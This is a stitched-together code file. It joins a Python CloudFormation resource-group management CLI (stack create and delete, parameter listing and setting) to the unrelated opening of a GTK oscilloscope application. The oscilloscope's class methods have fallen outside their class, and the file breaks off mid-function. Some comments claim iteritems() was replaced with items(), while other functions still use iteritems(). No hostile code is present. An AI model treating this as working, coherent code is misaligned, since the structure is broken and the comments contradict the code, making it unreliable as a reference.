    # The Custom::EmptyDeployment placeholder (see delete_stack) is no longer
    # needed once a real resource group exists.
    if 'EmptyDeployment' in deployment_resources:
        del deployment_resources['EmptyDeployment']

    deployment_template_url = deployment_uploader.upload_content(constant.DEPLOYMENT_TEMPLATE_FILENAME, json.dumps(deployment_template),
        'deployment template with resource group definitions')

    # wait a bit for S3 to help insure that templates can be read by cloud formation
    time.sleep(constant.STACK_UPDATE_DELAY_TIME)

    try:
        context.stack.update(
            deployment_stack_id,
            deployment_template_url,
            deployment_parameters,
            pending_resource_status = __nest_pending_resource_status(args.deployment, pending_resource_status),
            capabilities = capabilities
        )
    except:
        # Let the GUI pick up the (possibly partial) stack state before re-raising.
        context.config.force_gui_refresh()
        raise

    context.config.force_gui_refresh()

    context.view.resource_group_stack_created(args.deployment, args.resource_group)

    # Upload CGP content and run the post-update hooks.
    after_update(deployment_uploader, args.resource_group)

    # Deprecated in 1.9 - TODO remove
    context.hooks.call_module_handlers('cli-plugin-code/resource_group_hooks.py', 'on_post_update',
        args=[args.deployment, args.resource_group],
        deprecated=True
    )
def delete_stack(context, args):
    '''Deletes the CloudFormation stack for a resource group via a deployment stack update.

    Does a "safe" delete of a resource group stack. The existing deployment
    template is modified to remove the stack and config resources and used
    to update the deployment. This prevents unexpected changes to other resource
    groups as a side effect of the deployment update.

    Raises:
        HandledError: if neither the stack nor the config resource is present
            in the current deployment template.
    '''
    resource_group_stack_id = context.config.get_resource_group_stack_id(args.deployment, args.resource_group)
    pending_resource_status = context.stack.get_pending_resource_status(
        resource_group_stack_id,
        new_template = {}
    )

    # Is it ok to do this?
    capabilities = context.stack.confirm_stack_operation(
        None, # stack id
        'deployment {} resource group {}'.format(args.deployment, args.resource_group),
        args,
        pending_resource_status
    )

    project_uploader = ProjectUploader(context)
    deployment_uploader = project_uploader.get_deployment_uploader(args.deployment)

    context.view.processing_template('{} deployment'.format(args.deployment))

    deployment_stack_id = context.config.get_deployment_stack_id(args.deployment)
    deployment_template = context.stack.get_current_template(deployment_stack_id)
    deployment_parameters = context.stack.get_current_parameters(deployment_stack_id)
    deployment_resources = deployment_template.get('Resources', {})

    # Remove the group's stack resource and its Configuration resource, if present.
    resource_group_stack_resource = deployment_resources.get(args.resource_group, None)
    if resource_group_stack_resource is not None:
        del deployment_resources[args.resource_group]

    resource_group_config_resource = deployment_resources.get(args.resource_group + 'Configuration', None)
    if resource_group_config_resource is not None:
        del deployment_resources[args.resource_group + 'Configuration']

    if resource_group_stack_resource is None and resource_group_config_resource is None:
        # Fixed grammar in the user-facing error message ("where" -> "were").
        raise HandledError('Definitions for {} resource group related resources were not found in the current {} deployment template.'.format(args.resource_group, args.deployment))

    # CloudFormation requires at least one resource; insert a placeholder when the
    # deployment would otherwise become empty (create_stack removes it again).
    if not deployment_resources:
        deployment_resources['EmptyDeployment'] = {
            "Type": "Custom::EmptyDeployment",
            "Properties": {
                "ServiceToken": { "Ref": "ProjectResourceHandler" }
            }
        }

    deployment_template_url = deployment_uploader.upload_content(constant.DEPLOYMENT_TEMPLATE_FILENAME, json.dumps(deployment_template),
        'deployment template without resource group definitions')

    resource_group_stack_id = context.stack.get_physical_resource_id(deployment_stack_id, args.resource_group)

    # wait a bit for S3 to help insure that templates can be read by cloud formation
    time.sleep(constant.STACK_UPDATE_DELAY_TIME)

    # Tell stack.update that a child stack is being deleted so that it
    # cleans up any resources that stack contains.
    pending_resource_status = {
        args.resource_group: {
            'OldDefinition': {
                'Type': 'AWS::CloudFormation::Stack'
            },
            'PendingAction': context.stack.PENDING_DELETE
        }
    }

    try:
        context.stack.update(
            deployment_stack_id,
            deployment_template_url,
            deployment_parameters,
            pending_resource_status = pending_resource_status,
            capabilities = capabilities
        )
    except:
        # Let the GUI pick up the (possibly partial) stack state before re-raising.
        context.config.force_gui_refresh()
        raise

    context.config.force_gui_refresh()

    context.view.resource_group_stack_deleted(args.deployment, args.resource_group)
def __nest_pending_resource_status(deployment_name, pending_resource_status):
    '''Prefixes each pending resource name with "<deployment_name>." so statuses for a
    child (resource group) stack can be reported in the context of the deployment stack.

    Uses dict.items() instead of the Python-2-only iteritems() so the helper also
    works under Python 3; behavior is identical for iteration.
    '''
    return { deployment_name + '.' + name: status for name, status in pending_resource_status.items() }
def before_update(deployment_uploader, resource_group_name):
    '''Prepares a resource group for a stack create/update.

    Uploads the processed resource group template and the zipped lambda function
    code, then invokes the pre-update hook handlers.

    Args:
        deployment_uploader: uploader for the target deployment.
        resource_group_name: name of the resource group being updated.

    Returns:
        A (resource_group_uploader, resource_group_template_url) tuple.
    '''
    context = deployment_uploader.context
    deployment_name = deployment_uploader.deployment_name

    resource_group_uploader = deployment_uploader.get_resource_group_uploader(resource_group_name)

    group = context.resource_groups.get(resource_group_name)

    context.view.processing_template('{} resource group'.format(resource_group_name))

    # Publish the group's base settings into context.config.aggregate_settings.
    group.add_aggregate_settings(context)

    resource_group_template_with_parameters = group.get_template_with_parameters(deployment_name)
    resource_group_template_url = resource_group_uploader.upload_content(
        constant.RESOURCE_GROUP_TEMPLATE_FILENAME,
        json.dumps(resource_group_template_with_parameters, indent=4, sort_keys=True),
        'processed resource group template')

    __zip_individual_lambda_code_folders(
        group, resource_group_uploader, deployment_name)

    # Deprecated in 1.9. TODO: remove.
    resource_group_uploader.execute_uploader_pre_hooks()

    # Hook for the group's own resource-manager-code/update.py module.
    context.hooks.call_single_module_handler('resource-manager-code/update.py', 'before_this_resource_group_updated', resource_group_name,
        kwargs = {
            'deployment_name': deployment_name,
            'resource_group_name': resource_group_name,
            'resource_group_uploader': resource_group_uploader
        }
    )

    # Hook broadcast to every module that provides resource-manager-code/update.py.
    context.hooks.call_module_handlers('resource-manager-code/update.py', 'before_resource_group_updated',
        kwargs = {
            'deployment_name': deployment_name,
            'resource_group_name': resource_group_name,
            'resource_group_uploader': resource_group_uploader
        }
    )

    return (resource_group_uploader, resource_group_template_url)
def after_update(deployment_uploader, resource_group_name):
    '''Finalizes a resource group stack create/update.

    Uploads the group's CGP (Cloud Gem Portal) content and invokes the
    post-update hook handlers.

    Args:
        deployment_uploader: uploader for the target deployment.
        resource_group_name: name of the resource group that was updated.
    '''
    context = deployment_uploader.context
    deployment_name = deployment_uploader.deployment_name

    group = context.resource_groups.get(resource_group_name)
    resource_group_uploader = deployment_uploader.get_resource_group_uploader(resource_group_name)

    group.update_cgp_code(resource_group_uploader)

    # Deprecated in 1.9 - TODO remove
    resource_group_uploader.execute_uploader_post_hooks()

    # Hook for the group's own resource-manager-code/update.py module.
    context.hooks.call_single_module_handler('resource-manager-code/update.py', 'after_this_resource_group_updated', resource_group_name,
        kwargs = {
            'deployment_name': deployment_name,
            'resource_group_name': resource_group_name,
            'resource_group_uploader': resource_group_uploader
        }
    )

    # Hook broadcast to every module that provides resource-manager-code/update.py.
    context.hooks.call_module_handlers('resource-manager-code/update.py', 'after_resource_group_updated',
        kwargs = {
            'deployment_name': deployment_name,
            'resource_group_name': resource_group_name,
            'resource_group_uploader': resource_group_uploader
        }
    )
def __zip_individual_lambda_code_folders(group, uploader, deployment_name):
    '''Zips and uploads the code folder for each Custom::LambdaConfiguration
    resource found in the group's effective template.

    Changes: "not x == y" replaced with the idiomatic "x != y", and the
    Python-2-only iteritems() replaced with items() (identical iteration behavior,
    also valid under Python 3).
    '''
    resources = group.effective_template(deployment_name)["Resources"]
    for name, description in resources.items():
        if description["Type"] != "Custom::LambdaConfiguration":
            continue
        uploader.zip_and_upload_lambda_function_code(description["Properties"]["FunctionName"])
def list(context, args):
    '''Lists all resource groups and, when possible, their deployment stack status.

    NOTE: this function shadows the builtin "list" within this module; do not use
    the builtin name below this point in the file.

    Args:
        context: the resource manager context.
        args: parsed command line args; uses args.deployment (optional).
    '''
    resource_groups = []

    # Describe every known resource group from local configuration.
    for group in context.resource_groups.values():
        resource_group_description = {
            'Name': group.name,
            'ResourceGroupTemplateFilePath': group.template_path,
            'CliPluginCodeDirectoryPath': group.cli_plugin_code_path,
            'CGPResourceCodePath': group.cgp_code_path,
            'BaseSettingsFilePath': group.base_settings_file_path,
            'GameSettingsFilePath': group.game_settings_file_path,
            'Enabled': group.is_enabled
        }
        resource_group_description['LambdaFunctionCodeDirectoryPaths'] = __gather_additional_code_directories(context, group)
        resource_groups.append(resource_group_description)

    stack_checked = False
    deployment_name = None
    if context.config.project_initialized:
        deployment_name = args.deployment or context.config.default_deployment
        if deployment_name is not None:

            deployment_stack_id = context.config.get_deployment_stack_id(deployment_name)
            try:
                resources = context.stack.describe_resources(deployment_stack_id, recursive=False)
            except NoCredentialsError:
                # Without AWS credentials, fall back to local-only status below.
                resources = {}

            # Merge the live stack status into each local group description.
            for resource_group in resource_groups:
                resource = resources.get(resource_group['Name'], None)
                if resource is None:
                    # Enabled but not deployed -> pending create; disabled -> just disabled.
                    if resource_group['Enabled']:
                        resource = {
                            'ResourceStatus': '',
                            'PendingAction': context.stack.PENDING_CREATE,
                            'PendingReason': context.stack.PENDING_CREATE_REASON
                        }
                    else:
                        resource = {
                            'ResourceStatus': 'DISABLED'
                        }
                else:
                    # Deployed but locally disabled -> pending delete.
                    if not resource_group['Enabled']:
                        resource.update(
                            {
                                'PendingAction': context.stack.PENDING_DELETE,
                                'PendingReason': 'The resource group is not enabled.'
                            })
                resource_group.update(resource)

            # find stack resources in deployment stack that don't exist in the template
            for name, resource in resources.iteritems():
                if resource['ResourceType'] == 'AWS::CloudFormation::Stack':
                    found = False
                    for resource_group in resource_groups:
                        if resource_group['Name'] == name:
                            found = True
                            break
                    if not found:
                        # NOTE: 'Name' is set here and again in the update() call below;
                        # the second assignment is redundant but harmless.
                        resource['Name'] = name
                        resource.update(
                            {
                                'Name': name,
                                'PendingAction': context.stack.PENDING_DELETE,
                                'PendingReason': context.stack.PENDING_DELETE_REASON
                            }
                        )
                        resource_groups.append(resource)

            stack_checked = True

    # No deployment stack was consulted; synthesize status from local config only.
    if not stack_checked:
        for resource_group in resource_groups:
            if resource_group['Enabled']:
                resource = {
                    'ResourceStatus': '',
                    'PendingAction': context.stack.PENDING_CREATE,
                    'PendingReason': context.stack.PENDING_CREATE_REASON
                }
            else:
                resource = {
                    'ResourceStatus': 'DISABLED',
                }
            resource_group.update(resource)

    context.view.resource_group_list(deployment_name, resource_groups)
def __gather_additional_code_directories(context, group):
    '''Returns the lambda-code directory path for each AWS::Lambda::Function
    resource defined in the group's template.

    Changes: "== None" replaced with "is None", "not x == y" with "x != y"
    (PEP 8 idiom), and the Python-2-only iteritems() with items().
    '''
    additional_dirs = []

    # do any individual folders exist?
    for name, description in group.template.get("Resources", {}).items():
        if description is None:  # This can happen with a malformed template
            continue
        if description.get("Type", "") != "AWS::Lambda::Function":
            continue
        code_path = ResourceGroupUploader.get_lambda_function_code_path(context, group.name, name)
        additional_dirs.append(code_path)

    # TODO: should this list include common-code directories as well?
    return additional_dirs
def describe_stack(context, args):
    '''Describes the stack of a single resource group within a deployment.

    Handles four states: no stack + enabled group (pending create), no stack +
    disabled group, existing stack + removed group (pending delete), and existing
    stack + disabled group (pending delete).
    '''
    stack_id = context.config.get_resource_group_stack_id(args.deployment, args.resource_group, optional=True)
    group = context.resource_groups.get(args.resource_group, optional=True)

    if(stack_id is None):
        # NOTE(review): group can be None here (get(..., optional=True) above), in
        # which case group.is_enabled would raise AttributeError -- confirm callers
        # guarantee the group exists when no stack id is found.
        if group.is_enabled:
            stack_description = {
                'StackStatus': '',
                'PendingAction': context.stack.PENDING_CREATE,
                'PendingReason': context.stack.PENDING_CREATE_REASON
            }
        else:
            stack_description = {
                'StackStatus': 'DISABLED'
            }
    else:
        stack_description = context.stack.describe_stack(stack_id)
        if not group:
            # Stack exists but the group definition is gone -> it will be deleted.
            stack_description.update(
                {
                    'PendingAction': context.stack.PENDING_DELETE,
                    'PendingReason': context.stack.PENDING_DELETE_REASON
                }
            )
        else:
            if not group.is_enabled:
                stack_description.update(
                    {
                        'PendingAction': context.stack.PENDING_DELETE,
                        'PendingReason': 'The resource group is not enabled.'
                    }
                )

    # Count user-defined resources; AccessControl is framework-managed, so skip it.
    user_defined_resource_count = 0
    this_template = {}
    if group:
        this_template = group.template
    for key, resource in this_template.get('Resources', {}).iteritems():
        if key != 'AccessControl':
            user_defined_resource_count += 1

    context.view.resource_group_stack_description(args.deployment, args.resource_group, stack_description, user_defined_resource_count)
def list_parameters(context, args):
    '''Lists resource group parameter values from the project settings.

    Filters by args.deployment, args.resource_group and args.parameter when given;
    the '*' wildcard entries in settings always match the deployment and
    resource group filters.

    Raises:
        HandledError: if the project stack has not been created yet.
    '''
    if not context.config.project_initialized:
        raise HandledError('A project stack must be created before parameters can be listed.')

    project_settings = context.config.project_settings

    parameters = []
    for deployment_name, deployment_settings in project_settings.get('deployment', {}).iteritems():
        # Skip deployments that match neither the filter nor the wildcard.
        if args.deployment and deployment_name not in (args.deployment, '*'):
            continue
        for resource_group_name, resource_group_settings in deployment_settings.get('resource-group', {}).iteritems():
            if args.resource_group and resource_group_name not in (args.resource_group, '*'):
                continue
            for parameter_name, parameter_value in resource_group_settings.get('parameter', {}).iteritems():
                if args.parameter and parameter_name != args.parameter:
                    continue
                parameters.append(
                    {
                        'parameter_name': parameter_name,
                        'parameter_value': parameter_value,
                        'deployment_name': deployment_name,
                        'resource_group_name': resource_group_name
                    })

    context.view.parameter_list(parameters)
def set_parameter(context, args):
    '''Sets a resource group parameter value in the project settings and saves them.

    Warns (without failing) when the named deployment or resource group does not
    exist, since '*' wildcards and not-yet-created targets are legitimate.

    Raises:
        HandledError: if the project stack has not been created yet.
    '''
    if not context.config.project_initialized:
        raise HandledError('A project stack must be created before parameters can be listed.')

    if args.deployment != '*' and args.deployment not in context.config.deployment_names:
        context.view.no_such_deployment_parameter_warning(args.deployment)

    if args.resource_group != '*' and args.resource_group not in context.resource_groups:
        context.view.no_such_resource_group_parameter_warning(args.resource_group)

    # Walk/create the nested settings structure down to the parameter dict.
    parameters = (context.config.project_settings
        .setdefault('deployment', {})
        .setdefault(args.deployment, {})
        .setdefault('resource-group', {})
        .setdefault(args.resource_group, {})
        .setdefault('parameter', {}))

    previous_value = parameters.get(args.parameter, None)
    parameters[args.parameter] = args.value

    context.view.parameter_changed(args.deployment, args.resource_group, args.parameter, args.value, previous_value)

    context.config.save_project_settings()
def clear_parameter(context, args):
    '''Removes a parameter from matching deployment/resource-group settings, after confirmation.

    Collects every matching (deployment, resource group, parameter) entry first,
    asks the view to confirm, then deletes them and saves the settings.

    Raises:
        HandledError: if the project stack has not been created yet.
    '''
    if not context.config.project_initialized:
        raise HandledError('A project stack must be created before parameters can be listed.')

    project_settings = context.config.project_settings

    # Pass 1: gather all matching parameter entries without modifying anything.
    change_list = []
    for deployment_name, deployment_settings in project_settings.get('deployment', {}).iteritems():
        if not args.deployment or deployment_name == args.deployment:
            for resource_group_name, resource_group_settings in deployment_settings.get('resource-group', {}).iteritems():
                if not args.resource_group or resource_group_name == args.resource_group:
                    parameters = resource_group_settings.get('parameter', {})
                    if args.parameter in parameters:
                        change_list.append(
                            {
                                'deployment_name': deployment_name,
                                'resource_group_name': resource_group_name,
                                'parameter_name': args.parameter,
                                'parameter_value': parameters[args.parameter]
                            })

    if change_list:
        ok = context.view.confirm_parameter_clear(change_list, args.confirm_clear)
        if ok:
            # Pass 2: apply the confirmed deletions, re-resolving each path defensively.
            for change in change_list:
                deployment_settings = project_settings.get('deployment', {}).get(change['deployment_name'], None)
                if deployment_settings:
                    resource_group_settings = deployment_settings.get('resource-group', {}).get(change['resource_group_name'], None)
                    if resource_group_settings:
                        parameters = resource_group_settings.get('parameter', {})
                        if change['parameter_name'] in parameters:
                            del parameters[change['parameter_name']]
            context.config.save_project_settings()
    else:
        context.view.parameter_not_found(args.deployment, args.resource_group, args.parameter)
def list_resource_group_resources(context, args):
    '''Lists the resources of a resource group, including pending changes.

    Works both for groups known locally and for groups that were removed locally
    but still have a deployed stack (whose resources are then pending delete).

    Raises:
        HandledError: if the group is unknown and no stack for it exists.
    '''
    deployment_name = args.deployment
    resource_group_name = args.resource_group

    if deployment_name is None:
        deployment_name = context.config.default_deployment

    resource_group = context.resource_groups.get(resource_group_name, optional = True)
    if resource_group:
        if deployment_name:
            resource_group_stack_id = resource_group.get_stack_id(deployment_name, optional=True)
        else:
            resource_group_stack_id = None
        pending_resource_status = resource_group.get_pending_resource_status(deployment_name)
    else:
        # resource group may have been removed but there is still a stack
        if deployment_name:
            resource_group_stack_id = context.config.get_resource_group_stack_id(deployment_name, resource_group_name, optional=True)
        else:
            resource_group_stack_id = None
        if not resource_group_stack_id:
            raise HandledError('The resource group {} does not exist.'.format(resource_group_name))
        pending_resource_status = context.stack.get_pending_resource_status(
            resource_group_stack_id,
            new_template = {} # resource status will be pending DELETE
        )

    context.view.resource_group_resource_list(
        resource_group_stack_id,
        deployment_name,
        resource_group_name,
        pending_resource_status
    )
def add_player_access(context, args):
    '''Grants the Player role permission to perform an action on a resource, and
    records the dependency on the group's AccessControl resource.

    Args:
        context: the resource manager context.
        args: uses args.resource_group, args.resource and args.action.
    '''
    # Add player access to the resource permissions
    security.add_permission_to_role(context, args.resource_group, args.resource, 'Player', args.action)

    # Add the dependency to access control resource; only save and report when
    # ensure_access_control actually changed the template.
    group = context.resource_groups.get(args.resource_group)
    if security.ensure_access_control(group.template, args.resource):
        context.config.save_resource_group_template(args.resource_group)
        context.view.access_control_dependency_changed(args.resource_group, args.resource)
def create_function_folder(context, args):
    '''Creates the lambda-code folder for a lambda function resource, seeding it
    with the default lambda code content.

    Unless args.force is set, validates that the named function exists in the
    group's template and is an AWS::Lambda::Function.

    Raises:
        HandledError: if validation fails (and args.force is not set).
    '''
    group = context.resource_groups.get(args.resource_group)
    function_path = os.path.join(group.directory_path, 'lambda-code', args.function)

    if not args.force:
        function_template_definition = util.dict_get_or_add(group.template, 'Resources', {}).get(args.function, {})
        if not function_template_definition:
            raise HandledError("Function {} does not exist in Resource group {}. Not adding lambda-code folder".format(args.function, args.resource_group))
        # Use .get so a definition without a 'Type' key raises a HandledError below
        # instead of an unhandled KeyError; also replaces "not x == y" with "!=".
        if function_template_definition.get('Type') != 'AWS::Lambda::Function':
            raise HandledError("{} is not a Lambda Function resource in Resource group {}. Not adding lambda-code folder".format(args.function, args.resource_group))

    if not os.path.exists(function_path):
        # if function folder does not already exist add it
        context.config.copy_default_lambda_code_content(function_path)
|
"""
This file is part of YAOS and is licenced under the MIT licence.
"""
import gettext
gettext.bindtextdomain('yaosapp', '/lang')
gettext.textdomain('yaosapp')
_ = gettext.gettext
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib, Gio, Gdk, GdkPixbuf
import sys, time, random, math
from datetime import datetime
import ScopeController as SC
import UIChannelTab, UIDisplayTab, UITriggerTab, UIChannelWidget, UINotifier, ScopeArena, Utils
# Path of the GtkBuilder UI definition for the main application window.
LAYOUT_FILE = "resources/mainapp.gtkbuilder"

# Load debug logger (root logger; handler configuration is expected to happen elsewhere).
import logging
log = logging.getLogger()

# Possible icon sizes
SIZE_OTHER = 0
SIZE_ICON = 1

# Popup menu options as (label, handler name[, accelerator]) tuples; a None entry
# produces a separator. Handlers are presumably resolved to MainApplication
# methods when the menu is built in setup_context_menu -- confirm there.
popdown_menu_options = [
    (_("Save Settings"), "_menu_save_settings", "<Ctrl>S"),
    (_("Load Settings"), "_menu_load_settings", "<Ctrl>O"),
    (_("Quick Save Settings"), "_menu_quick_save_settings", "<Ctrl><Alt>S"),
    (_("Quick Load Settings"), "_menu_quick_load_settings", "<Ctrl><Alt>O"),
    (_("Defaults"), "_menu_load_defaults"),
    None,
    (_("Help"), "_menu_help", "F1"),
    (_("About & Credits"), "_menu_about"),
    (_("Licences"), "_menu_licence"),
    None,
    (_("Preferences"), "_menu_preferences"),
    (_("Shutdown"), "_menu_shutdown"),
    (_("Reboot"), "_menu_reboot"),
    (_("Exit Application"), "_menu_exit", "<Alt>F4"),
]

# How often to refresh UI data. Lower number = more CPU, faster refresh.
# 1000 / 25.0 = 40 ms period, i.e. a 25 Hz UI update rate.
UI_REFRESH_MS = 1000 / 25.0

# Minimum delay between refreshes; as load in a tick increases the delay might reduce to keep the UI
# responsive (& above rate consistent), but we don't want to steal all of GTK's time
UI_MIN_DELAY_MS = 5.0

# How long to wait before syncing a last save state.
STATE_SYNC_WAIT = 10

# UI space usage, estimated to set the waveform render target size
UI_VERTICAL_SPACE = 48
UI_HORIZONTAL_SPACE = 196
def dialog_box(window, pri_text, sec_text, icon, buttons):
    """Show a modal message dialog and return the user's response code.

    Args:
        window: parent Gtk window for the dialog.
        pri_text: primary text, rendered bold via markup.
        sec_text: secondary (detail) text.
        icon: Gtk.MessageType to display.
        buttons: Gtk.ButtonsType set to offer.

    Returns:
        The Gtk response code from running the dialog.
    """
    dialog = Gtk.MessageDialog(window, 0, icon, buttons, "")
    dialog.set_markup("<b>{0}</b>".format(pri_text))
    dialog.format_secondary_text(sec_text)
    response = dialog.run()
    dialog.destroy()
    return response
class MainApplication(object):
    """
    MainApplication handles the main application UI thread as well as starting the
    various service tasks that run the oscilloscope application.

    It doesn't handle anything to do with waveform acquisition or rendering. Those
    are handled from within WaveApp and the GL application.
    """
    # NOTE: the attributes below are class-level defaults; the mutable lists
    # (ui_tabs, ui_widgets) are shared class state that instance methods append
    # to -- acceptable for a singleton UI object, but worth knowing when testing.
    status_icon_size = 0
    channel_tab_shading_factor = 0.0
    ui_tabs = []      # settings-notebook tab controllers
    ui_widgets = []   # per-channel info widgets
    active_ch = 0     # currently selected channel index

    # Flasher variable; flips state at config FlashFreq rate
    flash_period = 0
    flash_state = False
    flash_timer = 0
    flash_error = 0

    # UI tick bookkeeping (timing, window geometry, FPS averaging)
    last_ui_time = None
    last_clock_time = 0
    ticks = 0
    last_window_size = (0, 0)
    delay_tick = 0
    last_tick = 0
    fps_average_accu = 0
    fps_average_count = 0
    fps_average = 0

    # Time that the acquisition automatically starts; used for power-up auto start
    start_auto = 0.0

    # Last time the state was synced and whether a new state needs to be synced
    last_state_sync_time = time.time()
    state_sync_pending = True

    # Used for UI caching
    last_acq_params = None
def __init__(self, cfgmgr):
    """
    Init function. This loads the GUI configuration, the application configurator,
    and the required skin/theme.

    Args:
        cfgmgr: application configuration manager; Render, Theme and UI sections
            are read during initialisation.
    """
    self.cfgmgr = cfgmgr

    log.info("Start initialising oscilloscope control")
    self.ctrl = SC.ScopeController(self)

    # Here we'd display a splash screen while setting everything up...

    # Connect the ScopeController to hardware.
    self.ctrl.set_render_parameters(int(self.cfgmgr.Render.DisplaySamples), int(self.cfgmgr.Render.DisplayHDivisionsYT))
    self.ctrl.connect()
    log.info("Done initialising oscilloscope control")

    # Load CSS file as specified in config file and apply it to everything
    log.info("Start initialising GTK configuration")
    self.css = Gtk.CssProvider()
    self.css.load_from_file(Gio.File.new_for_path(self.cfgmgr.Theme.CSSFile))
    Gtk.StyleContext.add_provider_for_screen(Gdk.Screen.get_default(), self.css, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)

    # NOTE(review): stored as resource_icon_size while the class attribute is
    # status_icon_size -- confirm which name the icon-drawing code reads.
    self.resource_icon_size = int(self.cfgmgr.Theme.StatusIconSize)
    self.resource_root = str(self.cfgmgr.Theme.ResourceDir)

    # Load the GtkBuilder application object and load common objects.
    self.builder = Gtk.Builder()
    self.builder.add_from_file(LAYOUT_FILE)
    self.overlay_main = Gtk.Overlay()
    self.vbox_main = self.builder.get_object("vbox_main")
    self.hbox_main = self.builder.get_object("hbox_main")
    self.overlay_main.add(self.vbox_main)
    self.overlay_fixed = Gtk.Fixed()
    self.window = Gtk.Window()
    self.window.set_size_request(1280, 800)
    self.window.add(self.overlay_main)
    self.lbl_status_time = self.builder.get_object("lbl_status_time")
    self.lbl_status_run = self.builder.get_object("lbl_status_run")
    self.lbl_status_run_ctx = self.lbl_status_run.get_style_context()

    # Since the contents of these labels can change, set their size to be at least 80 pixels wide each
    # TODO: Do we need to make this configurable by the stylesheet/theme?
    self.lbl_status_bits_samplerate = self.builder.get_object("lbl_status_bits_samplerate")
    self.lbl_status_npoints_nwaves = self.builder.get_object("lbl_status_npoints_nwaves")
    self.lbl_status_bits_samplerate.set_size_request(80, -1)
    self.lbl_status_npoints_nwaves.set_size_request(80, -1)

    # Connect to the timebase labels
    self.evt_lbl_status_timebase = self.builder.get_object("evt_lbl_status_timebase")
    self.evt_lbl_status_timebase.connect("button-press-event", self._timebase_click)
    self.lbl_status_timebase = self.builder.get_object("lbl_status_timebase")
    self.ui_update_timebase_labels()

    # Create the AccelGroup for all key bindings
    self.agr = Gtk.AccelGroup()
    self.window.add_accel_group(self.agr)

    # Create the notifier controller; its Fixed container is added as a
    # pass-through overlay so notifications do not intercept input events.
    self.notifier = UINotifier.NotifyController()
    self.overlay_main.add_overlay(self.overlay_fixed)
    self.overlay_main.set_overlay_pass_through(self.overlay_fixed, True)
    self.notifier.set_fixed_container(self.overlay_fixed)

    # Test default images
    self.set_svg_image("img_status_trigger_type", "trigger_rising_edge", SIZE_ICON)
    self.set_svg_image("img_status_wifi", "wifi_3", SIZE_ICON)
    self.set_svg_image("img_status_net", "network_active", SIZE_ICON)
    self.set_svg_image("img_status_usb", "blank", SIZE_ICON)
    self.set_svg_image("img_status_mute", "blank", SIZE_ICON)

    # Set logo
    self.ebx_img_logo = self.builder.get_object("ebx_img_logo")
    self.ebx_img_logo.connect("button-press-event", self._logo_clicked)
    self.img_logo = self.builder.get_object("img_logo")
    self.img_logo.set_from_file(self.cfgmgr['UI']['Logo'])

    # Apply common CSS classes
    self.add_css_class_by_widget_name("lbl_status_run", "runstate_common")
    self.add_css_class_by_widget_name("lbl_status_timebase_char", "status_box_left_horiz_common")
    self.add_css_class_by_widget_name("lbl_status_delay_char", "status_box_left_horiz_common")
    self.add_css_class_by_widget_name("lbl_status_timebase", "status_box_right_horiz_common")
    self.add_css_class_by_widget_name("lbl_status_delay", "status_box_right_horiz_common")
    self.add_css_class_by_widget_name("lbl_status_trigger_char", "status_box_left_horiz_common")
    self.add_css_class_by_widget_name("img_status_trigger_type", "status_box_middle_horiz_common")
    self.add_css_class_by_widget_name("grd_status_trigger_channel_container", "status_box_middle_horiz_common")
    self.add_css_class_by_widget_name("lbl_status_trigger_info", "status_box_right_horiz_common")

    # Set the application title.
    self.window.set_title(_("BluePulse Oscilloscope - Main"))

    # Connect window signals
    self.window.connect("key_press_event", self._wnd_key_press)
    self.window.connect("key_release_event", self._wnd_key_release)
    self.window.connect("configure-event", self._wnd_config_event)

    self.setup_settings_notebook()
    self.setup_channel_widgets()
    self.setup_context_menu()
    self.setup_render_arena()
    self.restore_settings_last()

    # Done initialisation of GUI stuff
    log.info("Done initialising GTK configuration")

    # Set the start signal. It will start the acquisition automatically a few seconds after the application launches.
    self.start_auto = time.time() + 6.0
def setup_settings_notebook(self):
    """Populate the settings notebook.

    Creates one tab per hardware channel, then a display tab and a trigger
    tab.  Every tab object is retained in self.ui_tabs so it can be
    refreshed on each UI tick.
    """
    # Load the GtkBuilder resource for the channel tabs in the selection notebook, and
    # add one tab for each channel. Add additional tabs for display, acquire, trigger etc.
    # XXX: Should we empty the notebook first?
    log.info("Creating settings notebook")
    self.nbk_main_settings = self.builder.get_object("nbk_main_settings")
    # Keep the notebook from expanding horizontally; the waveform area gets the space.
    self.nbk_main_settings.set_hexpand(False)
    self.nbk_main_settings.set_hexpand_set(True)
    self.nbk_main_settings.set_size_request(50, 0)
    self.nbk_main_settings.connect("select_page", self._nbk_select_page)
    # Add channel tabs; the position argument is the current tab count + 1.
    for idx, channel in enumerate(self.ctrl.channels):
        ui_tab = UIChannelTab.ChannelTab(self, idx, self.nbk_main_settings, len(self.ui_tabs) + 1)
        ui_tab.append_to_notebook()
        self.ui_tabs.append(ui_tab)
    # Add display tab
    ui_tab = UIDisplayTab.DisplayTab(self, self.nbk_main_settings, len(self.ui_tabs) + 1)
    ui_tab.append_to_notebook()
    self.ui_tabs.append(ui_tab)
    # Add trigger tab (refreshed immediately so it shows current trigger state)
    ui_tab = UITriggerTab.TriggerTab(self, self.nbk_main_settings, len(self.ui_tabs) + 1)
    ui_tab.append_to_notebook()
    ui_tab.refresh_ui()
    self.ui_tabs.append(ui_tab)
    # TODO: acquire, math, reference, storage, utility...
def setup_channel_widgets(self):
    """Create one ChannelWidget per hardware channel and pack each one into
    the channel info container."""
    log.info("Creating channel widgets")
    self.box_channel_info = self.builder.get_object("box_channel_info")
    for channel_index, _channel in enumerate(self.ctrl.channels):
        channel_widget = UIChannelWidget.ChannelWidget(self, channel_index)
        container = channel_widget.get_embedded_container()
        self.box_channel_info.pack_start(container, False, True, 0)
        self.ui_widgets.append(channel_widget)
def setup_context_menu(self):
    """Create the dropdown general purpose menu that is triggered by key press or clicking
    the application logo.

    Menu content is driven by the module-level popdown_menu_options table:
    a None entry produces a separator; other entries are tuples of
    (label, handler method name) with an optional third accelerator string.
    """
    self.popdown_menu = Gtk.Menu()
    self.popdown_menu.set_accel_group(self.agr)
    row = 0
    for opt in popdown_menu_options:
        if opt is None:
            # None placeholder marks a separator row.
            item = Gtk.SeparatorMenuItem()
        else:
            item = Gtk.MenuItem(opt[0])
            if len(opt) == 3:
                # Third element is an accelerator spec parsed by Gtk.accelerator_parse.
                keyval, mod = Gtk.accelerator_parse(opt[2])
                item.add_accelerator("activate", self.agr, keyval, mod, Gtk.AccelFlags.VISIBLE)
            # Second element names a handler method on this object.
            item.connect("activate", getattr(self, opt[1]))
        self.popdown_menu.attach(item, 0, 1, row, row + 1)
        row += 1
def setup_render_arena(self):
    # Attach the waveform rendering arena to the main horizontal box; the
    # (True, True, 0) tuple is the pack_start expand/fill/padding arguments.
